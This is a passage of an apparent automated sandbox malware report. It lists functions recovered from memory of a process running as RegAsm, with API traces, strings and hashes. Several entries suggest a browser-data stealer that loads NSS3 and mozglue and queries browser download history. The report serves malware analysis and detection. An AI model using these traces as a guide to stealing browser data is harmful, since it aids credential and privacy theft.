                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: IntervalMilliseconds$ErrorValue
                                                                                                        • String ID: n,l
                                                                                                        • API String ID: 3163584228-3692751573
                                                                                                        • Opcode ID: 4ed785ea87b01ac1b06a3522731c1fa08a9f4b8226943bc3bedf2def7a9cdc23
                                                                                                        • Instruction ID: 97a16ea4b8c9c22824eba9f9126167634e5eb8ed8f378dfbf1896af6bfa4e159
                                                                                                        • Opcode Fuzzy Hash: 4ed785ea87b01ac1b06a3522731c1fa08a9f4b8226943bc3bedf2def7a9cdc23
                                                                                                        • Instruction Fuzzy Hash: C431F23361065BEFDB145F34CC85B96B7A5AB0131AF20063CEC9AD2A41EB356454CF81
                                                                                                        Function 6C25A8F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C242AE9,00000000,0000065C), ref: 6C25A91D
                                                                                                          • Part of subcall function 6C1FADC0: TlsGetValue.KERNEL32(?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE10
                                                                                                          • Part of subcall function 6C1FADC0: EnterCriticalSection.KERNEL32(?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE24
                                                                                                          • Part of subcall function 6C1FADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C1DD079,00000000,00000001), ref: 6C1FAE5A
                                                                                                          • Part of subcall function 6C1FADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE6F
                                                                                                          • Part of subcall function 6C1FADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE7F
                                                                                                          • Part of subcall function 6C1FADC0: TlsGetValue.KERNEL32(?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAEB1
                                                                                                          • Part of subcall function 6C1FADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAEC9
                                                                                                        • PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C242AE9,00000000,0000065C), ref: 6C25A934
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000000,?,?,6C242AE9,00000000,0000065C), ref: 6C25A949
                                                                                                        • free.MOZGLUE(?,00000000,0000065C), ref: 6C25A952
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                        • String ID: *$l
                                                                                                        • API String ID: 1595327144-2875788949
                                                                                                        • Opcode ID: c9b6980ca5801f5ef603459e7b8fa8571d300cd73a54d554d30a20b1514423fc
                                                                                                        • Instruction ID: 8f21c01b24db512771771782988c489f5825bd73b7c4a8479780d5c7d0a74c47
                                                                                                        • Opcode Fuzzy Hash: c9b6980ca5801f5ef603459e7b8fa8571d300cd73a54d554d30a20b1514423fc
                                                                                                        • Instruction Fuzzy Hash: 143146F4601216DFDB04CF28D991E63BBE8FF48319B5581A9EC098B752E730E811CBA1
                                                                                                        Function 6C0F74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetLastError.KERNEL32(00000000), ref: 6C0F7526
                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C0F7566
                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C0F7597
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Init_thread_footer$ErrorLast
                                                                                                        • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                        • API String ID: 3217676052-1401603581
                                                                                                        • Opcode ID: 092f836e6f00005925a9ef0184562a42fe4f272e24202a829965d635286a5315
                                                                                                        • Instruction ID: 8289e1d3c4011a79e109a5570f4fc8d1d223ca57c981afb3512503b2add44261
                                                                                                        • Opcode Fuzzy Hash: 092f836e6f00005925a9ef0184562a42fe4f272e24202a829965d635286a5315
                                                                                                        • Instruction Fuzzy Hash: 7621F539705501A7DB15CBEDC91AF5D33F6EB46768B104529EC2547F80C738B8838A97
                                                                                                        Function 6C28A800 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6C157915,?,?), ref: 6C28A86D
                                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6C157915,?,?), ref: 6C28A8A6
                                                                                                        Strings
                                                                                                        • database corruption, xrefs: 6C28A89B
                                                                                                        • %s at line %d of [%.10s], xrefs: 6C28A8A0
                                                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C28A891
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _byteswap_ulongsqlite3_log
                                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                        • API String ID: 912837312-598938438
                                                                                                        • Opcode ID: 41b258046bfe7ba9237ad7b272fd44cee895d18d7640f388f66d4020ff3018b7
                                                                                                        • Instruction ID: dea3689469dd717a21f5b24925848c1f06d0c260d97e70ed7f7a59b83f8b3b7f
                                                                                                        • Opcode Fuzzy Hash: 41b258046bfe7ba9237ad7b272fd44cee895d18d7640f388f66d4020ff3018b7
                                                                                                        • Instruction Fuzzy Hash: F2110675A01208EBD704CF21DC41AAAB7A5FF48314F408039FC154BAC0EB30991AC7A2
                                                                                                        Function 0040F2B1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0040F2C7
                                                                                                          • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC5A
                                                                                                          • Part of subcall function 0042EC45: __CxxThrowException@8.LIBCMT ref: 0042EC6F
                                                                                                          • Part of subcall function 0042EC45: std::exception::exception.LIBCMT ref: 0042EC80
                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0040F2E6
                                                                                                        • _memmove.LIBCMT ref: 0040F320
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 3404309857-4289949731
                                                                                                        • Opcode ID: eafd812e86a1b85e87936770ea95ce4ffc0e42962baa9f97ece83f385a396649
                                                                                                        • Instruction ID: 57eaf4f8ed72a9c9f24929b0a4870ba8c902719b5e729f6aa90dd4ccac796c9b
                                                                                                        • Opcode Fuzzy Hash: eafd812e86a1b85e87936770ea95ce4ffc0e42962baa9f97ece83f385a396649
                                                                                                        • Instruction Fuzzy Hash: 6611E0713002029FCB24DF6DD881A59B3A5BF45324754053AF816EBAC2C7B8ED498799
                                                                                                        Function 6C1A0DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C1A0BDE), ref: 6C1A0DCB
                                                                                                        • strrchr.VCRUNTIME140(00000000,0000005C,?,6C1A0BDE), ref: 6C1A0DEA
                                                                                                        • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C1A0BDE), ref: 6C1A0DFC
                                                                                                        • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C1A0BDE), ref: 6C1A0E32
                                                                                                        Strings
                                                                                                        • %s incr => %d (find lib), xrefs: 6C1A0E2D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: strrchr$Print_stricmp
                                                                                                        • String ID: %s incr => %d (find lib)
                                                                                                        • API String ID: 97259331-2309350800
                                                                                                        • Opcode ID: 467dfe21e705bc644904692364b5096448eef1e778615161994be46767c93914
                                                                                                        • Instruction ID: d184094b5b9d0ea908684ed9083edc7943d61123b75426ed4384b7ff4a6c5e54
                                                                                                        • Opcode Fuzzy Hash: 467dfe21e705bc644904692364b5096448eef1e778615161994be46767c93914
                                                                                                        • Instruction Fuzzy Hash: D70124B2B403149FE6208F64DC46E5773ACDB45A09B05452DED0AD3A41E762FC1987E2
                                                                                                        Function 6C25AC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PK11_FreeSymKey.NSS3(?,@]$l,00000000,?,?,6C236AC6,?), ref: 6C25AC2D
                                                                                                          • Part of subcall function 6C1FADC0: TlsGetValue.KERNEL32(?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE10
                                                                                                          • Part of subcall function 6C1FADC0: EnterCriticalSection.KERNEL32(?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE24
                                                                                                          • Part of subcall function 6C1FADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C1DD079,00000000,00000001), ref: 6C1FAE5A
                                                                                                          • Part of subcall function 6C1FADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE6F
                                                                                                          • Part of subcall function 6C1FADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAE7F
                                                                                                          • Part of subcall function 6C1FADC0: TlsGetValue.KERNEL32(?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAEB1
                                                                                                          • Part of subcall function 6C1FADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C1DCDBB,?,6C1DD079,00000000,00000001), ref: 6C1FAEC9
                                                                                                        • PK11_FreeSymKey.NSS3(?,@]$l,00000000,?,?,6C236AC6,?), ref: 6C25AC44
                                                                                                        • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]$l,00000000,?,?,6C236AC6,?), ref: 6C25AC59
                                                                                                        • free.MOZGLUE(8CB6FF01,6C236AC6,?,?,?,?,?,?,?,?,?,?,6C245D40,00000000,?,6C24AAD4), ref: 6C25AC62
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                        • String ID: @]$l
                                                                                                        • API String ID: 1595327144-1809380887
                                                                                                        • Opcode ID: bfb14fcb55c8f73d61db0920d308c1b4e0b2ffafee61f0dd4d120a12948e9fdf
                                                                                                        • Instruction ID: 49d9000c1d64fa613e6dd6e4de65da9494500281bdc6f3562e7a6cf7bd98a25c
                                                                                                        • Opcode Fuzzy Hash: bfb14fcb55c8f73d61db0920d308c1b4e0b2ffafee61f0dd4d120a12948e9fdf
                                                                                                        • Instruction Fuzzy Hash: 9F0178B5600604DBDB00CF18E8C1B57B7A8AB04B1AF188069EC098F706D734E818CBB2
                                                                                                        Function 6C0FC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,?,6C0FC0E9), ref: 6C0FC418
                                                                                                        • GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C0FC437
                                                                                                        • FreeLibrary.KERNEL32(?,6C0FC0E9), ref: 6C0FC44C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                        • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                        • API String ID: 145871493-2623246514
                                                                                                        • Opcode ID: a6a5fece48645c9144d4cf3d7d794451a3261463628a76de06ec975581b21942
                                                                                                        • Instruction ID: dd643fd1cfa9862e385f2ca1ba0b2a18653bd99ce1a2729f9ef5f09c0f9f7cfa
                                                                                                        • Opcode Fuzzy Hash: a6a5fece48645c9144d4cf3d7d794451a3261463628a76de06ec975581b21942
                                                                                                        • Instruction Fuzzy Hash: A9E0B6B4606B019BDF00BF75CB0B7117BF8A706708F044626EA2891F10EBBCD032AB50
                                                                                                        Function 6C14A910 Relevance: 7.7, APIs: 5, Instructions: 241COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 37e870cbbd79e3a23d1d77ed5e1518cbb068b228c716fb1d8b6d1d70848fd69e
                                                                                                        • Instruction ID: a6da9e299bc43439b6916b3569091c86b40ff673f2247a6647e3f877bc92085b
                                                                                                        • Opcode Fuzzy Hash: 37e870cbbd79e3a23d1d77ed5e1518cbb068b228c716fb1d8b6d1d70848fd69e
                                                                                                        • Instruction Fuzzy Hash: 8291C4727003048FEB08DF65E8CABAB77B9BB56318F16443DE54647B40DB38A845CB92
                                                                                                        Function 004092A7 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 192stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                        • lstrlenA.KERNEL32(?), ref: 004094AB
                                                                                                        • lstrlenA.KERNEL32(?), ref: 004094C6
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                        • String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
                                                                                                        • API String ID: 2500673778-2241552939
                                                                                                        • Opcode ID: 7ced90a649ff221f7bde020ab2f4116feee36ff5ac8d8cfbed5ae13c3b06d1e2
                                                                                                        • Instruction ID: 7fac0f62cf2577a5a8d57f6ab71485126a571a4460cd7af8d0bbaabf91a59925
                                                                                                        • Opcode Fuzzy Hash: 7ced90a649ff221f7bde020ab2f4116feee36ff5ac8d8cfbed5ae13c3b06d1e2
                                                                                                        • Instruction Fuzzy Hash: EA712D71A40119ABCF01FFA6DE469DDB775AF04309F610026F500B70A1DBB8AE898B98
                                                                                                        Function 6C1AEDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • TlsGetValue.KERNEL32 ref: 6C1AEDFD
                                                                                                        • calloc.MOZGLUE(00000001,00000000), ref: 6C1AEE64
                                                                                                        • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C1AEECC
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C1AEEEB
                                                                                                        • free.MOZGLUE(?), ref: 6C1AEEF6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorValuecallocfreememcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3833505462-0
                                                                                                        • Opcode ID: e02439a4c6286c005abe11ed13d184574320b2caef33eb6aeeec7268d8a452cc
                                                                                                        • Instruction ID: 72d9df66c5448df8e05cc3693ed74073df9d8700191f02e152bbe73418b1c36c
                                                                                                        • Opcode Fuzzy Hash: e02439a4c6286c005abe11ed13d184574320b2caef33eb6aeeec7268d8a452cc
                                                                                                        • Instruction Fuzzy Hash: 8931E9756002009FE7209FACCC457667BF4FF46315F150629E95A87A50E731E635CBE1
                                                                                                        Function 6C1BAD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PORT_ArenaMark_Util.NSS3(00000000,?,6C1B3FFF,00000000,?,?,?,?,?,6C1B1A1C,00000000,00000000), ref: 6C1BADA7
                                                                                                          • Part of subcall function 6C2114C0: TlsGetValue.KERNEL32 ref: 6C2114E0
                                                                                                          • Part of subcall function 6C2114C0: EnterCriticalSection.KERNEL32 ref: 6C2114F5
                                                                                                          • Part of subcall function 6C2114C0: PR_Unlock.NSS3 ref: 6C21150D
                                                                                                        • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C1B3FFF,00000000,?,?,?,?,?,6C1B1A1C,00000000,00000000), ref: 6C1BADB4
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C2110F3
                                                                                                          • Part of subcall function 6C2110C0: EnterCriticalSection.KERNEL32(?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21110C
                                                                                                          • Part of subcall function 6C2110C0: PL_ArenaAllocate.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211141
                                                                                                          • Part of subcall function 6C2110C0: PR_Unlock.NSS3(?,?,?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C211182
                                                                                                          • Part of subcall function 6C2110C0: TlsGetValue.KERNEL32(?,6C1B8802,00000000,00000008,?,6C1AEF74,00000000), ref: 6C21119C
                                                                                                        • SECITEM_CopyItem_Util.NSS3(00000000,?,6C1B3FFF,?,?,?,?,6C1B3FFF,00000000,?,?,?,?,?,6C1B1A1C,00000000), ref: 6C1BADD5
                                                                                                          • Part of subcall function 6C20FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C208D2D,?,00000000,?), ref: 6C20FB85
                                                                                                          • Part of subcall function 6C20FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C20FBB1
                                                                                                        • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C2D94B0,?,?,?,?,?,?,?,?,6C1B3FFF,00000000,?), ref: 6C1BADEC
